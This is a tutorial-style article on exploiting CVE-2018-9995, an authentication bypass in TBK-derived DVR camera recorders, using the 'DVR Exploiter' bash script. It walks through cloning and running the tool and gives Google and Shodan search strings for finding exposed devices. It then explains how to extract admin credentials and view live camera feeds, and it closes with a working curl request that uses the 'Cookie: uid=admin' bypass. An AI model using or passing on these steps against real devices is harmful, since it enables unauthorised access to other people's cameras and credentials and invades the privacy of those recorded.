A security expert Belahsan Ouerghi has shed light on a new hacking tool called DVR Exploiter that exploits the CVE-2018-9995 vulnerability against IoT devices. It is able to extract account credentials of DVR devices thereby accessing the devices and their video feeds.
TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a “Cookie: uid=admin” header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
More than 50k cameras are still vulnerable with this vulnerability which already created an havoc in internet. Of the main concerns surrounding GetDvR and the associated CVE-2018-9995 and CVE-2018-10676 vulnerability is the fact that there are many “white label” and rebranded versions of DVR IoT equipment by TBK. Many brands and online sellers advertise the devices using different names and for some users it may be hard to update them.
The first step is to install the bash script as shown below:
Command: git clone https://github.com/TunisianEagles/DVR-Exploiter.git
Next give full executable permissions to bash file with command chmod +x DVR-Exploiter.sh and execute the file by typing ./DVR-Exploiter.sh as shown below:
Now Here you’ve two options, either you can find your target in IP or in domain format, based on that you can select the option.
There are so many ways to find vulnerable DVR Cameras online with the help of either Google or Shodan.
- inurl: login.rsp
- intitle: ‘DVR Login’
- html: ‘/login.rsp’
- ‘Server: GNU rsp/1.1’
With Shodan, you can see the following output:
Once you find the IP or domain where DVR Cameras are running, copy that host and paste in the tool terminal and press enter which extracts the credentials of DVR Camera Box.
Access the DVR Camera in Internet Explorer Browser (Make sure that you must install the DVR Plugin to view the screen) and login with valid credentials.
As soon as you logged in, you’ll see the welcome screen with the list of cameras 🙂
Other Exploitation Methods/Tools –
- CVE-2018-9995_dvr_credentials Python Script
- curl “http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list” -H “Cookie: uid=admin”